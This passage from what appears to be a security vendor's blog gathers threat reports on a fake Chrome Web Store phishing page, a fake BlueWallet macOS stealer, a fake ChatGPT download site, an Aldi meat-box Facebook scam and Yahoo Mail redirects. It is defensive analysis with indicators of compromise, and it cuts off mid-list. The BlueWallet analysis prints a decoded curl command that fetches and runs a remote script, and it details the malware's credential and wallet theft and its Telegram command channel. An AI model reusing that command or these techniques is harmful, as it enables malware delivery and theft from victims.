    None of it is real. The page is not operated by Google. The complaint, deadline, and countdown are fabricated. The goal is to trick you into entering your Google username and password into a fake sign-in window controlled by the scammer.

    The most important rule to remember: Genuine warnings about your extension appear in your Chrome Web Store developer dashboard, not on a third-party website.

    Why scammers want developer accounts

    Chrome extensions have access to users’ browsers, and they can be updated automatically.

    If attackers gain control of a developer account, they may be able to modify an extension, access developer resources, or potentially distribute malicious updates to existing users.

    That’s what makes developer accounts such attractive targets, and why scams like these are prevalent.

    What the scam looks like

    The page is hosted on a domain that has nothing to do with Google. In the version we analyzed, the site used the address dmca-chrome-extensions[.]click.

    Despite that, it uses Google’s branding and presents itself as a “Chrome Web Store Developer Policy Center.”

    The page first asks for the link or ID of your extension. That seems harmless, which is exactly why it works.

    Fake copyright removal request pretending to be from the Chrome Web Store.

    It uses your own extension to look convincing

    After you enter your extension ID, the page briefly displays a “Looking up extension…” message and then builds a fake takedown notice around your real extension.

    When we tested the scam with Malwarebytes Browser Guard, it displayed our genuine extension name, icon, and Chrome Web Store listing alongside the fake complaint.

    The fake site, pulling publicly available info about your extension.

    The site is simply pulling publicly available information from your extension’s Chrome Web Store page. Anyone can see that information. The scammers use it to make the fake notice appear legitimate.

    Everything else is invented.

    The complaint number, “date received,” 48-hour deadline, countdown timer, and timeline of events are generated by the scam page itself.

    The countdown is there to rush you

    A red warning banner claims your extension will be permanently removed unless you act within 48 hours, and a clock counts down by the second. The whole layout pushes you toward one button: sign in with Google to “verify your identity” and file your appeal. 

    The urgency is designed to create pressure so you react before taking the time to verify the claim.

    The fake sign-in window

    When you click “Continue to verification,” a Google sign-in window appears with a title bar, padlock, and address showing accounts.google.com.

    Convincing sign-in window

    It looks authentic, but it isn’t.

    The “window” is actually part of the web page itself. The padlock and address are just graphics designed to look like a real browser window.

    The scammers even tailor the appearance to match your operating system, showing Mac-style windows on macOS and Windows-style windows on Windows devices.

    Anything typed into this fake sign-in form is sent directly to the scammers.

    One giveaway is that the window cannot leave the browser page. Try dragging it to the edge of your screen and it stops at the browser border. Minimize the browser and it disappears as well.

    Most importantly, your browser’s real address bar still shows the scam site’s address, not Google’s.

    How to stay safe

    The good news is that a few simple habits defeat this scam.

    • Don’t trust the link. If you receive a warning about your extension, go directly to your Chrome Web Store developer dashboard and check there.
    • Be suspicious of urgency. Legitimate policy processes don’t rely on countdown clocks to force immediate action.
    • Check the address bar. A real Google sign-in page appears at accounts.google.com in your browser’s actual address bar.
    • Test the window. If a sign-in window can’t be dragged outside the browser or disappears when the browser is minimized, it’s probably fake.
    • Turn on stronger sign-in protection. Passkeys and hardware security keys make stolen passwords far less useful to attackers.
    • Use security software with phishing and web protection. Our Browser Guard, which is also part of Malwarebytes Premium can help block malicious websites and phishing pages before you enter sensitive information.

    This isn’t a crude phishing page. It uses your real extension details, mimics Google’s branding, and creates a convincing sense of urgency.

    If you receive a warning about your extension, don’t follow the link and don’t race the countdown. Go directly to your Chrome Web Store developer dashboard and verify the claim there.

    When in doubt, close the tab.

    If you already entered your details

    Act quickly.

    • Change your Google password immediately from a trusted device.
    • Sign out of all active sessions in your Google account security settings.
    • Review connected apps and devices for anything unfamiliar.
    • Turn on two-step verification, preferably using a passkey or security key.
    • Check your Chrome Web Store listings for changes, uploads, or new versions you didn’t publish.

    Indicators of Compromise (IOCs)

    Domain

    dmca-chrome-extensions[.]click


    Stop threats before they can do any harm.

    Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

    •  

    Fake BlueWallet steals passwords, accounts, and crypto from Macs

    A fake website impersonating BlueWallet (a real Bitcoin wallet) is targeting Mac users with a simple but effective attack. BlueWallet itself has not been compromised. Instead, cybercriminals have stolen the name and branding of the legitimate Bitcoin wallet to make a malicious download appear trustworthy.

    If you went looking for a cryptocurrency wallet and landed on one of these fake BlueWallet download pages, the site tried to trick you into opening a downloaded file in a built-in macOS tool and pressing “Run.” If you followed those instructions, the malware could steal saved passwords, browser logins, cryptocurrency wallets, documents, and other sensitive data. It also watches the clipboard for cryptocurrency wallet addresses and can replace them with attacker-controlled addresses..

    That last feature is particularly dangerous. If you copy a wallet address before sending funds, the malware can silently replace it with the attacker’s address. Everything looks normal on screen, but the money goes somewhere else.

    Should you worry? Only if you downloaded and ran the file. Simply visiting the page and closing it does nothing on its own. The attack depends entirely on the user opening the script and pressing play.

    If you did run it, treat the machine as compromised and follow the steps below.

    What to do if you may have run it

    If you opened the file and pressed play, assume your device was compromised and work through these steps:

    • Disconnect the machine from the network to cut the control channel
    • Run a full scan of the device, and make sure you’re using up-to-date security software with web protection enabled
    • From a different, trusted device, change passwords for any accounts used on the Mac, starting with email and cryptocurrency exchanges
    • Move any cryptocurrency to a new wallet created on a clean device
    • Treat existing seed phrases and keys as exposed
    • Before sending crypto in future, verify the full destination address character by character
    • Check for and remove unfamiliar files in ~/Library/LaunchAgents
    • Look for a hidden .sysupd.sh file in /tmp
    • Rotate cloud and SSH credentials if .ssh, .aws, or .gnupg files were present on the machine
    • When in doubt, back up your data and reinstall macOS from a known-good source rather than trying to clean in place

    Picked up something you shouldn’t have?


    Social engineering tricks

    The most interesting part of this campaign isn’t technical. The attackers didn’t break into the Mac or bypass Apple’s security protections. They persuaded victims to run the malware themselves.

    The fake website walks users through the process with a convincing download page, simple instructions, and even a keyboard shortcut. The attack succeeds because the victim trusts what they are seeing.

    As operating systems get better at blocking malicious software, attackers are increasingly investing in social engineering. Instead of finding ways around security controls, they convince people to click through them.

    That’s why one habit is becoming increasingly important: Be suspicious of any download that arrives with instructions to open it in a scripting tool, developer utility, or Terminal window and press “Run.”

    In this campaign, a single press of ⌘R was enough to turn a Mac into a password stealer, cryptocurrency wallet thief, clipboard hijacker, and remote access tool.

    Technical analysis

    Stage one: The AppleScript downloader

    The page lives at update-bluewallet[.]com, a domain name close enough to the real wallet (bluewallet.io) to pass a quick glance. The first thing the page does is not wait for consent. Its script calls a download routine on a two-second timer the moment the page loads, and again if the visitor clicks either of two buttons.

    The file that lands in the Downloads folder is named BlueWallet Installer.applescript, an extension most people have never seen and have no instinct to distrust.

    Then the page does something quietly clever. After a short delay, it rewrites its own status text to read like setup instructions: open the installer, then press the play button or ⌘R. It even draws a small blue play triangle in the text so the wording matches the real Script Editor interface the victim is about to see.

    Fake BlueWallet website that guides the victim through downloading and running the malicious script

    The page walks the victim through the exact motions needed to run the file.

    On modern macOS, an unsigned application downloaded from the web gets quarantined and checked before it can run. A plain script opened in Script Editor and executed by the user sidesteps that flow. The person is manually instructing a trusted Apple tool to run code, so there is no notarization gate to fail.

    This is why the attacker chose an AppleScript instead of a packaged app: it moves the risky action out of the operating system’s hands and into the victim’s.

    The AppleScript itself is remarkably short. Stripped of its decorative comments, including a fake version number and a line claiming to be a “Brew Install Upgrade,” it runs a single base64-encoded shell command and then tells Script Editor to quit without saving, removing the evidence from view.

    Brew Install Upgrade

    Decoded, that command does this:

    curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &

    It fetches a second script from a remote host, saves it to a hidden file in the temp directory, makes it executable, and runs it in the background with all output suppressed.

    The victim sees nothing. The filename .sysupd.sh is dressed up to look like a system update. This is a textbook staged dropper: stage one is tiny and disposable, and its only job is to fetch the real payload.

    Stage two: Payload analysis

    The first lines establish how the malware intends to operate. It sets umask 077 so everything it creates is readable only by the compromised user, then builds a hidden, randomly named working directory under /tmp seeded from /dev/urandom.

    Its configuration is obfuscated, but weakly. A small function named _xd walks a hex string two characters at a time and XORs each byte against a hardcoded repeating key: swckR9JCD2Uu.

    That function decodes the script’s Telegram bot token, chat identifier, secondary command token, and staging URL at runtime. It is enough to defeat tools that only search for plaintext strings, but not much more. Because the key and algorithm are both sitting in the file, every encoded value is fully recoverable.

    One detail stands out: The decoded Telegram chat value and decoded command-and-control chat value are identical. The attacker is using a single Telegram channel as both the exfiltration drop and the control channel. It is cheap, scalable, encrypted, and blends into ordinary HTTPS traffic.

    Not everything is obfuscated. The clipboard-hijacking addresses are sitting in the file in plain text: a Bitcoin address, an Ethereum address, and a Solana address. These are the addresses the implant swaps in when it catches you copying a wallet address. Because they are public on their respective blockchains, they are also among the most useful artifacts in the whole sample.

    What the malware steals

    The second stage’s collection routines are sweeping. They pull from six broad categories.

    1. Web browsers

    The script extracts history, cookies, login data, and bookmarks from a wide range of browsers, including:

    • Chromium-based browsers: Google Chrome Stable, Beta, Canary, and Dev; Brave; Microsoft Edge; Vivaldi; Opera; Opera GX; Arc; Chromium; Coccoc; and Yandex
    • Firefox-based browsers: Firefox, Waterfox, Pale Moon, Zen, and LibreWolf
    • macOS native browser data: Safari cookies, history, and form values

    2. Cryptocurrency wallets

    This appears to be the script’s primary focus.

    It targets desktop wallet applications including Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop, and Tonkeeper.

    It also targets browser-extension wallets across several ecosystems:

    • Bitcoin: Xverse, Leather, UniSat, Alby, and Wizz
    • Solana: Phantom, Solflare, Backpack, Nightly, MagicEden, Sollet, and Slope
    • EVM wallets: MetaMask, Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin, and XDEFI
    • Cosmos: Keplr, Station, and Cosmostation
    • Other ecosystems: Yoroi, Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos, and Temple

    3. Password managers and security tools

    The malware targets local storage and settings for several password managers, including LastPass, 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt, and Buttercup.

    It also looks for data associated with 2FA and authenticator tools, including Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS, and FreeOTP.

    4. Communication and social apps

    The script attempts to copy session data and local storage for Telegram Desktop and Discord, including Discord Canary and Discord PTB.

    5. Developer and cloud tools

    It looks for credentials and configuration files in the user’s home directory, including:

    • AWS CLI configurations in .aws
    • SSH keys in .ssh
    • GnuPG keys in .gnupg
    • Kubernetes configs in .kube
    • Shell and Git files including .zshrc, .zsh_history, .bash_history, and .gitconfig

    6. Productivity apps and general files

    The script copies the local Apple Notes database, NoteStore.sqlite.

    It also looks for browser-extension data related to shopping and productivity tools, including Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist, and Google Keep.

    Finally, it scans Desktop, Documents, and Downloads for files with extensions including .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem, and .env, under a size cap.

    What it does with the stolen data

    The malware tries to capture the user’s account password directly. An osascript dialog titled “System Preferences” asks the user to re-enter their password “to continue.” The script validates each attempt against dscl . authonly before saving it, so it only stops once it has a working credential.

    For exfiltration, it archives the staged data with macOS’s own ditto, likely because it is always present, unlike zip. To stay under Telegram’s 50 MB upload limit, it breaks larger archives into 49 MB chunks with split before sending each part.

    It establishes persistence by writing a LaunchAgent plist into the user’s ~/Library/LaunchAgents, backed by a hidden support directory, and loading it with launchctl so the implant runs again at every login.

    The clipboard hijack is a live background loop. A clip_watch function continuously inspects the clipboard, matches Bitcoin, Ethereum, and Solana address formats by regex, reports the original address to the command-and-control channel, and overwrites the clipboard with the attacker’s address via pbcopy.

    That means the substitution happens silently between copy and paste.

    Finally, the malware can be controlled interactively. A c2_loop polls the Telegram bot for commands and supports a full operator toolkit:

    • /info for system details
    • /exec for arbitrary shell commands
    • /clipboard to read current clipboard contents
    • /download to pull specific files
    • /exfil to rerun the theft module
    • /selfdestruct to wipe traces

    This makes the Telegram channel a real-time remote-control link, not just a one-way drop.

    Living off the land, and off Telegram

    The pattern here is familiar and getting more common: lean on tools that are already trusted.

    The delivery abuses Apple’s own Script Editor. The configuration hides behind a trivial XOR rather than packed binaries. The command channel rides Telegram’s Bot API, which can pass through egress filters that would flag an unknown server.

    None of these pieces is novel on its own. The effectiveness comes from stacking legitimate-looking components so no single step trips an alarm.

    Detection opportunities

    The lessons here are less about the lure and more about the technique itself.

    Script Editor executing a one-line base64 do shell script that immediately quits is a strong behavioral signal, and a far better detection target than the disposable stage-one file. So is a hidden /tmp/.sysupd.sh downloaded by curl and launched in the background.

    Browsers and download surfaces could treat .applescript files arriving from the web with the same suspicion as executables. And Telegram remains an under-addressed command-and-control medium that bot-token abuse reporting could disrupt at the source.

    Indicators of Compromise

    File hashes (SHA-256)

    • 216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61 (BlueWallet Installer.applescript)

    Network indicators

    • update-bluewallet[.]com
    • projects2026box[.]com

    Clipboard-hijack addresses

    • BTC: bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e
    • ETH: 0x2B871703122064e45d77146a6D5203da3bD192FA
    • SOL: 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v

    We don’t just report on threats—we remove them

    Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

    •  

    Fake ChatGPT download site infects Windows and Mac users with malware

    A convincing fake website is impersonating OpenAI’s ChatGPT download page and infecting visitors with malware designed to steal passwords, browser data, cryptocurrency wallets, and other sensitive information.

    The site, openew[.]app, closely mimics OpenAI’s real ChatGPT download experience and offers what appear to be official desktop apps for both Windows and macOS. Instead, Windows users receive a credential-stealing malware loader, while Mac users get Odyssey Stealer, a fork of Atomic Stealer (AMOS), a well-known macOS malware family associated with cryptocurrency theft.

    Left ImageRight Image

    The dual-platform setup is what makes the operation notable. Clicking the Windows download delivers a fake installer that opens a back channel to an attacker-controlled server. Clicking the macOS button delivers malware that steals browser passwords, cookies, Telegram sessions, cryptocurrency wallets, and other sensitive files. It also attempts to replace legitimate Ledger and Trezor wallet apps with trojanized versions.

    If you only download ChatGPT from OpenAI’s official download page or the Microsoft Store, you were not the target here. But if you searched for “ChatGPT download” and clicked an ad or unfamiliar result, you may have given attackers access to your online accounts, browser sessions, saved passwords, and potentially your cryptocurrency holdings.

    Malwarebytes protects users from this malware.

    Technical analysis

    The domain, openew[.]app, closely resembles OpenAI’s real ChatGPT download experience. It uses a dark theme, OpenAI-style branding, familiar marketing copy, and prominent download buttons for macOS and Windows.

    The .app top-level domain is operated by Google and requires HTTPS connections, meaning browsers display the familiar padlock icon without obvious certificate warnings.

    The most important detail is the dual-platform setup. Real software vendors provide separate installers for Windows and macOS, and this fake site does exactly the same thing.

    Clicking the Windows button delivers Chat_GPT.exe, while clicking the macOS button downloads a disk image containing ChatGpt.dmg.

    The Windows malware

    Chat_GPT.exe is built almost entirely from off-the-shelf parts. The installer uses Inno Setup, a free open-source toolkit used by thousands of legitimate Windows products. Inside is an Electron application skeleton—the same Chromium-based framework used by apps like Slack and Discord—bundled with standard support libraries publicly available from the Electron project.

    When the victim runs the installer, it creates files under %APPDATA%\LeronApplication, launches EApp.exe, and spawns PowerShell with the flags -ExecutionPolicy Unrestricted -Command -. The trailing dash tells PowerShell to read commands from standard input, meaning the malicious instructions never touch the disk where scanners might detect them. Behavioral telemetry recorded HTTP traffic to 188.137.246.189 using a /laravel.php?api=api&hash=...&message=... endpoint, alongside injection-like activity and service/autorun persistence signals. Nine of 69 antivirus engines flagged the file as malicious at the time of analysis. The persistence evidence is better read as behavioral tradecraft than proof of a durable install, but the overall pattern is familiar commodity stealer/dropper territory: cheap, modular, and effective rather than technically novel.

    CAPTCHA displayed after the fake app launches, used to confirm that a real user is running it.
    CAPTCHA displayed after the fake app launches, used to confirm that a real user is running it.

    The macOS malware: Odyssey Stealer (an AMOS fork)

    The macOS payload sits at the premium end of the commodity-malware market. It’s Odyssey, which is a fork of the renowned AMOS, a malware-as-a-service platform documented since 2023.

    The identification is fairly clear-cut. The sandboxed sample matches documented Odyssey behavior patterns, which are inherited from its AMOS lineage: a long AppleScript chain passed to the macOS scripting engine, a silent password validation attempt using macOS directory-service commands, and, if that silent check fails, a fake macOS-style prompt reading “Please enter device password to continue,” complete with the familiar lock icon. Whatever the user types is validated against the same command. If it matches, the malware captures the user’s login password in cleartext.

    From there, it follows a familiar Odyssey/AMOS-fork playbook. It copies the macOS keychain, harvests cookies and saved logins from 12 Chromium-based browsers plus Firefox and Waterfox, and extracts Telegram session data. It also scans 16 cryptocurrency wallet directories, including Ledger Live, Trezor Suite, Exodus, Electrum, and Sparrow. Finally, it searches Desktop and Documents folders for files with extensions like .wallet, .seed, .key, and .kdbx. The collected data is compressed into a temporary archive and sent to a hardcoded server.

    The wallet replacement feature is especially dangerous

    There’s one more part of the macOS payload, and it’s likely the feature that justifies the price tag. After the initial data theft, the script downloads trojanized versions of Ledger Live, Ledger Wallet, and Trezor Suite from a second server. It then attempts to delete the legitimate wallet apps and replace them with the attacker’s versions.

    If the user’s password was captured earlier in the attack chain, the script uses sudo to force the replacement. If not, it falls back to a standard rm -rf deletion attempt, which can still succeed if the apps are installed in a user-writable location. Either way, the next time the victim opens what appears to be their wallet software, they may actually be launching the attacker’s replacement.

    This wallet-replacement behavior is a hallmark of the Poseidon/Odyssey branch of the AMOS family and makes cryptocurrency theft the most likely goal.

    What the operation cost to build

    This is where the AI angle becomes interesting, because the Windows and macOS sides of the operation sit at very different price points.

    The domain openew.app probably cost the operators around $15 a year through a normal registrar. The .app domain requires HTTPS by default, making it easy for operators to present the reassuring browser padlock users associate with legitimate websites. The landing page itself is simply a copy of OpenAI’s real download page, something modern cloning tools can reproduce in minutes.

    On the Windows side, most of the tools are cheap or free. Inno Setup is free. Electron is free. The Chromium support files are public downloads. The server infrastructure appears to rely on low-cost commodity malware tooling and a basic VPS that could cost only a few dollars a month. Altogether, the Windows side of this operation could plausibly have cost under $100 to set up initially.

    The macOS side is very different. Odyssey has reportedly rented for around $3,000 per month, paid in cryptocurrency. By comparison, Lumma—a popular Windows infostealer often treated as a similar product—has historically advertised entry tiers around $250 per month.

    That price gap says a lot. The operators clearly believe a successful Mac infection is worth much more money than a typical Windows infection.

    The likely reason is simple: Odyssey is designed specifically for cryptocurrency theft, including the wallet-replacement behavior seen in this campaign. The operators are betting that a meaningful number of Mac users hold cryptocurrency.

    Getting victims to the site is probably the only major ongoing cost, and that’s where the AI branding becomes valuable. Search ads, SEO poisoning, YouTube spam, and links shared in AI-focused Discord and Telegram communities can all drive traffic to fake download pages. Some of those channels cost money. Others are almost free.

    Why attackers are going after AI brands

    Most established software already has trusted download habits built around it. If you want Chrome, you probably know to go to Google. If you want Photoshop, you go to Adobe. People already know where the real download lives.

    AI tools are different because most users are still installing them for the first time, and that means relying on search results, ads, YouTube links, or social posts to find the download page. That creates an ideal environment for fake sites.

    Over the last two years, products like ChatGPT, Claude, Gemini, Sora, DeepSeek, Antigravity, and many others have launched or changed rapidly. Every new release creates another wave of users searching for “download ChatGPT” or “install Claude” without knowing the official URL. That search traffic is exactly where attackers set up shop.

    The fake pages also do not need to be especially sophisticated because legitimate AI product pages are already minimal by design: a modern layout, a logo, and a large download button. Openew[.]app matches what users expect to see. There is no broken English or aggressive pop-ups here, just identical branding, copy, and the reassuring browser padlock.

    What makes this kind of operation durable is how easily it can rotate brands. When the ChatGPT lure stops attracting clicks, the operators can reuse the same infrastructure around the next trending AI product. The malware behind the download button stays the same. Only the branding changes.

    What AI vendors could do

    Most major AI vendors, including OpenAI, already provide official download channels. The problem is visibility and user habit. Many users still search for “ChatGPT download,” where results can include official links, unofficial mirrors, and outright malicious sites.

    Large consumer brands and banks often run aggressive brand-protection campaigns against fake ads and impersonation domains. AI vendors may need to do the same more consistently.

    The other issue is discoverability. Official desktop-app links are often buried in settings menus or sidebars, while search engines are faster and more obvious. That’s exactly where the fake download sites are waiting.

    What to do if you may have installed the fake app

    If you recently installed something claiming to be ChatGPT from anywhere other than OpenAI’s official download page or the Microsoft Store, you may have been affected. From a different, clean device:

    • Sign out of your important accounts using each service’s “sign out everywhere” option. This includes email, banking, cloud storage, GitHub, Discord, Telegram, and cryptocurrency exchanges.
    • Change passwords starting with your primary email account.
    • Rotate any API keys, SSH keys, and cloud credentials stored on the affected machine.
    • If you hold cryptocurrency, move funds immediately using a separate clean device. On macOS specifically, do not open Ledger Live or Trezor Suite on the affected machine before reinstalling the operating system, as the wallet-replacement function may have succeeded.
    • Monitor bank accounts and payment cards for suspicious activity.
    • Reinstall the operating system. The Windows sample showed PowerShell command-and-control behavior, while the macOS payload may have captured the user’s login password. A clean reinstall is the safest recovery path.
    • If this was a work device, contact your IT or security team immediately.

    Malwarebytes protects users against this malware.

    Closing thoughts

    The reason this campaign is worth writing about is not the malware itself. Both payloads are already well documented. The Windows side is a commodity kit assembled from cheap, widely available parts. The macOS side, Odyssey Stealer is related to the AMOS malware family that has been tracked since 2023.

    What’s more interesting is the shape of the operation around that malware. A single fake site delivers two different payloads aimed at two different victim economics. Windows victims are positioned for broad monetization through credential and cookie theft. Mac victims are targeted more narrowly and lucratively through cryptocurrency theft, with operators apparently willing to spend thousands per month on tooling because the returns justify it.

    The lure tying both sides together is the AI brand itself. Right now, AI product names generate huge amounts of first-time-download traffic from users who do not yet know the official URLs.

    This is what a mature delivery business looks like. The interesting layer is not the binary, but the supply chain around it: the domain, certificate, clone page, traffic source, malware subscription, and exfiltration infrastructure. Each piece is cheap, modular, replaceable, and available off the shelf.

    And the operators are not choosing between Windows and macOS. They are serving both from the same page, with payloads tuned to each platform’s economics. When one AI brand stops converting, they can simply swap the branding and reuse the same infrastructure around the next trending product.

    AI hype will eventually fade. The kit probably will not.

    Indicators of Compromise (IOCs)

    File hashes (SHA-256)

    • c9e0e6985dca3a179c9bdea4e7b38f7dc57fe00ecedc2fd634256fc53bf2de2d (Chat_GPT.exe)
    • c0919e1999eaee67e67aeda0287722775afb04e9a9a0f727928b4d11265fb70b (ChatGpt.dmg)

    Network indicators

    • openew[.]app
    • 188[.]137[.]246[.]189
    • 192[.]253[.]248[.]181
    • 172[.]94[.]9[.]250

    CNET Editors' Choice Award 2026

    “One of the best cybersecurity suites on the planet.” 

    According to CNET. Read their review


    •  

    Facebook scam promises cheap Aldi meat boxes, steals payment info instead

    Sometimes you spot posts on social media that make you wonder if any moderation takes place at all.

    Which is concerning, because twothirds of all online shopping scams now start on Facebook and Instagram. Online shopping scams are alarmingly common and have become one of the most frequently reported scam types in Australia. The Dutch police have also warned specifically about fake ads promising steep discounts.

    Apparently, and this is an issue we’ve flagged before, social media platforms could stop scams, but they don’t because it hurts their revenue.

    The Aldi meat box scam

    This Facebook post immediately rattled my cage:

    Facebook post about Aldi meat box

    This promotion is not from Aldi and is not endorsed by the company. A random account, which may be compromised or completely fake, posts:

    “My son works at Aldi and told me about something almost nobody knows. To be honest, I thought he was joking at first. If you’re over 40, you can get a meat box from Aldi for under $10. Sounds crazy, but it actually worked. They’re clearing out excess stock and, instead of throwing it away, they’re basically letting people have it for next to nothing. All I did was fill out a short form , I left the link in the comments in case it’s useful to anyone. I signed up for my husband (he’s 59 and loves a good steak), and when the box arrived, he opened it like it was his birthday. Everything looked fresh, neatly packed, and honestly there was more inside than we expected. It took me about a minute to fill out the form. If you’re over 40, definitely give it a go , worst case you lose a minute, best case you get a great box of meat almost for free.”


    Scam or legit? Scam Guard knows.


    There are several red flags here. Malwarebytes Scam Guard flagged:

    • Unusual offer: Promises of high-value products (“meat box from Aldi for under $10”) for an extremely low price are classic signs of scams, especially when they leverage well-known brands.
    • Anecdotal story: The post uses a personal story (“My son works at Aldi…”) to appear trustworthy and relatable, a common technique in social engineering.
    • Age restriction: Arbitrarily targeting people over 40 is a psychological trick to make the offer feel exclusive and relevant.
    • External link: The most common tactic is to provide a link in the comments rather than in the main post to avoid automatic detection by the platform.
    • Urgency and simplicity: Encourages quick action with phrases like “took me about a minute,” downplaying any possible risk.

    As it turns out, the possible risk, or “worst case” as the Facebook post calls it, is a lot worse than losing a minute of your time.

    The link was posted as the first comment and used the link shortening service cutt[.]ly (and here’s why you should beware of those):

    The link in the first comment

    The first redirect sent me to a website where my device was fingerprinted using an embedded JavaScript before redirecting me to https://gifts-survey[.]life/click?key={identifier}, a site designed to mimic the Aldi website. I had my VPN set to the US.

    Aldi meat box scam leads to a fake Aldi site.

    The scam page immediately creates urgency with messages like “only 1 spot left” and “you only have 2 minutes to complete the survey,” trying to stop visitors from thinking things through.

    The survey itself only asks basic questions, so there wasn’t much harm in clicking through it on my virtual machine.

    Aldi meat box scam - fake Aldi site.

    As a reward, I got to pick three out of nine boxes to win a prize. I’m happy to report that I “aced” that test.

    Aldi meat box scam leads to a fake Aldi site.

    So, I was forwarded to the scammers’ real goal. On the domain hyperbargainsflow[.]shop, visitors are prompted to enter payment details for their discounted meat box, plus an optional upsell for faster delivery.

    Aldi meat box scam leads to a fake Aldi site requesting payment details.

    The final page asks victims to hand over personal details, including their full name, contact information, and home address, along with payment details for the fake “delivery” fee.

    The site also uses tricks like more than 1,000 fake 5-star ratings and attempts to auto-complete and auto-submit the form if fields are detected as pre-populated. Saves you the trouble of submitting all your data yourself. Isn’t that nice of them?

    We found that similar campaigns have targeted Woolworths customers in South Africa and Australia using fake butcher profiles, and the Aldi angle has appeared in other countries as well.

    How to stay safe

    If a post promises a box of premium meat for the price of a sandwich, assume it is a scam until you can prove otherwise.

    The same simple checks will help you avoid this Aldi meat box scam and the next look‑alike campaign that pops up tomorrow.

    • Sometimes scrolling past the enthusiastic, fake comments will reveal what real users are saying:
    Comments on the Facebook post
    • You can also help slow these scams down by reporting them. On Facebook, click the three-dot menu on the post and choose Report post > Scam, fraud or false information.
    • If a deal claims to be “known only by insiders” or “almost nobody knows this,” treat it as a red flag, not a perk. Real retailers advertise widely and on their own accounts. They don’t hide genuine promotions in badly written Facebook posts from throwaway accounts.
    • Be wary of links posted in the comments. Scammers sometimes use that tactic to avoid automated scanning and reporting on the platform.
    • Check the browser address bar carefully. Scam pages can copy a brand’s logo and colors perfectly, but the domain name usually gives the game away. 
    • Never enter card details, your full address, or your phone number into a site you reached via a random social post, especially if the offer feels too good to be true. If you already did, contact your bank or card issuer as soon as possible and monitor your statements.
    • Secure your devices. Use an up-to-date, real-time anti-malware solution with web protection. Malwarebytes blocks connections to unsafe sites like these.
    Malwarebytes blocks gifts-survey[.]life
    Malwarebytes blocks gifts-survey[.]life

    Pro tip: Malwarebytes Scam Guard recognized the Facebook post as a scam and could have saved somebody’s day.


    Let’s face it, an incognito window can only do so much. 
     
    Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance. 

    •  

    Why Malwarebytes blocks some Yahoo Mail redirects

    Some Malwarebytes users have recently noticed frequent web protection alerts while reading email in Yahoo Mail’s web interface. These alerts are caused by background connections from the Yahoo Mail page to a set of third‑party domains that our products and other security tools currently classify as risky.

    What we are seeing under the hood

    When you open Yahoo Mail in a browser, the page loads various embedded components for navigation, features, and metrics. As part of this, the interface makes calls to domains such as cook.howduhtable.com and related subdomains, sometimes in the context of URLs that include /ybar/mail.yahoo.com/ and a long encoded parameter. That encoded string often resolves to a URL like:

    https://gpt.mail.yahoo.net/sandbox?client=novation&version=0.1&haq=1&cache=1

    This suggests the traffic is being routed through what appears to be a sandboxed web component that Yahoo can use for things like telemetry, testing infrastructure, or mail features. It may also be part of an advertising or tracking flow, but at this time we cannot say with certainty exactly what purpose Yahoo is using it for.

    Regardless of intent, multiple security systems have observed these redirect domains and assigned them poor reputations. Characteristics include:

    • Frequently changing, opaque subdomains that do not resemble normal consumer‑facing Yahoo addresses
    • Use of encoded parameters and chained redirects that make it difficult for users, and sometimes defenders, to see the final destination at a glance
    • Existing detections and blocklists from other vendors that classify the infrastructure as suspicious or potentially malicious

    Because of these signals, Malwarebytes Web Protection and Browser Guard have been blocking a growing list of related subdomains to protect users, which is why some people see repeated alerts while using Yahoo Mail.

    What we are not saying

    It is important to be clear about what we do and do not know.

    We have not established that Yahoo Mail itself is compromised or that Yahoo is deliberately distributing malware through its mail platform. What we can say is that third‑party or internal components invoked from within the Yahoo Mail web interface are making connections through domains that behave very similarly to infrastructure commonly associated with malicious or deceptive advertising and tracking.

    From a security standpoint, this creates unnecessary risk. Any mechanism that injects content or runs sandboxed components via opaque redirect chains could, if misused or subverted in the future, expose users to harmful content without them ever clicking a suspicious link.

    Blocking these domains is a precautionary step in line with our normal protection standards.

    Why Malwarebytes blocks these redirects

    Our decision to block these connections is based on a combination of technical behavior and third‑party reputation data:

    • The redirects are triggered by embedded components in the Yahoo Mail interface, not by users intentionally browsing to those domains
    • The infrastructure relies on frequently changing, non‑descriptive domains and subdomains, a pattern we often see in malicious or evasive advertising and tracking systems
    • Multiple security vendors and automated reputation feeds already flag these domains as risky or malicious, and some have seen them associated with unwanted or harmful activity

    Because of this, Malwarebytes products currently block connections to these third‑party domains when they are invoked as part of Yahoo Mail’s web experience. This does not mean that all of Yahoo Mail is considered malicious. It means we are specifically interrupting a narrow set of background calls that present elevated risk.

    What this means for users

    If you use Yahoo Mail in a browser with Malwarebytes enabled, you may see:

    • Web protection or MWAC alerts referencing domains like cook.howduhtable.com or similar names while you are reading or composing email
    • Multiple alerts in a short period, because the mail interface may retry or rotate through different subdomains or IP addresses in the same family

    In most cases, your email content itself still loads, though certain embedded elements, metrics, or ad‑related content may fail to load or behave differently.

    How to stay safe and reduce interruptions

    You should not need to lower your protection to continue using Yahoo Mail. Here are some practical steps you can take:

    • Keep Malwarebytes protection enabled
      Leaving Web Protection and Browser Guard on ensures blocks remain in place if these redirects change behavior or begin serving harmful content in the future.
    • Avoid allowlisting the suspicious domains
